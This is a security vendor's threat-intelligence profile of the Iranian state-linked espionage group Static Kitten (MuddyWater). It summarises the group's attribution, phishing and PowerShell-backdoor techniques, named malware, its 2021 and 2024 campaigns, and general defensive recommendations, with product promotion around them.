Detect, Respond, Protect
See how the global Huntress SOC can augment your team
with 24/7 coverage and unmatched human expertise.
Start your free trial today.
Threat Actor Profile
Static Kitten
Static Kitten, also known as MuddyWater, Seedworm, TEMP.Zagros, and Mercury, is a sophisticated Iranian state-sponsored cyberespionage group that has operated since at least 2017. Strongly linked to Iran's Ministry of Intelligence and Security (MOIS), this group employs a variety of advanced tactics and techniques, including spear-phishing campaigns, PowerShell-based backdoors, and Android spyware, to target governments, academia, telecommunications, and NGOs primarily in the Middle East and Central Asia.
Threat Actor Profile
Static Kitten
Country of Origin
Static Kitten originates from Iran and is heavily associated with the country’s Ministry of Intelligence and Security (MOIS). This attribution is widely supported by multiple cybersecurity reports and analyses.
Members
The specific size and composition of Static Kitten remain unknown. The group utilizes a range of aliases, such as MuddyWater, Seedworm, and Mercury, to mask its operations, making attribution to individual members challenging.
Leadership
The leadership structure of Static Kitten is not publicly documented. However, given its ties to MOIS, it is assumed the group operates under the direct or indirect oversight of Iranian intelligence authorities.
Static Kitten TTPs
Tactics
Static Kitten’s primary motivation is to conduct espionage, focusing on intelligence gathering for geopolitical and economic advantages. This includes stealing sensitive data and intellectual property from strategic entities.
Techniques
To achieve its espionage objectives, Static Kitten frequently employs social engineering techniques, such as spear-phishing emails with malicious documents or links. The group also exploits legitimate tools like file-sharing platforms and remote management tools for covert operations.
Procedures
Static Kitten leverages POWERSTATS and NTSTATS PowerShell backdoors, Android spyware (e.g., DCHSpy), and custom malware like BugSleep and MuddyRot. Additionally, it uses legitimate tools like ScreenConnect and MSI installers in its campaigns to mask malicious activities and evade detection.
Want to Shut Down Threats Before They Start?
Notable Cyberattacks
One significant campaign in 2021 targeted government agencies in Kuwait and the UAE using Israeli-themed lures tied to ministries of foreign affairs. More recently, in 2024, Static Kitten expanded its operations with the development of a new attack framework, DarkBeatC2, and the deployment of BugSleep and MuddyRot implants to target Israel and other strategic regions.
Law Enforcement & Arrests
To date, there have been no confirmed arrests or law enforcement actions targeting Static Kitten, reflecting the challenges of addressing state-sponsored cyber threats at an international level.
How to Defend Against Static Kitten
1
Implement strong email security, including filtering phishing attempts and blocking malicious attachments.
2
Monitor for unusual use of remote management tools and PowerShell scripts.
3
Bolster mobile security by restricting apps from untrusted sources.
4
Patch known vulnerabilities promptly to limit exposure.
5
Leverage Huntress tools to detect persistence mechanisms and uncover malicious activities.
References
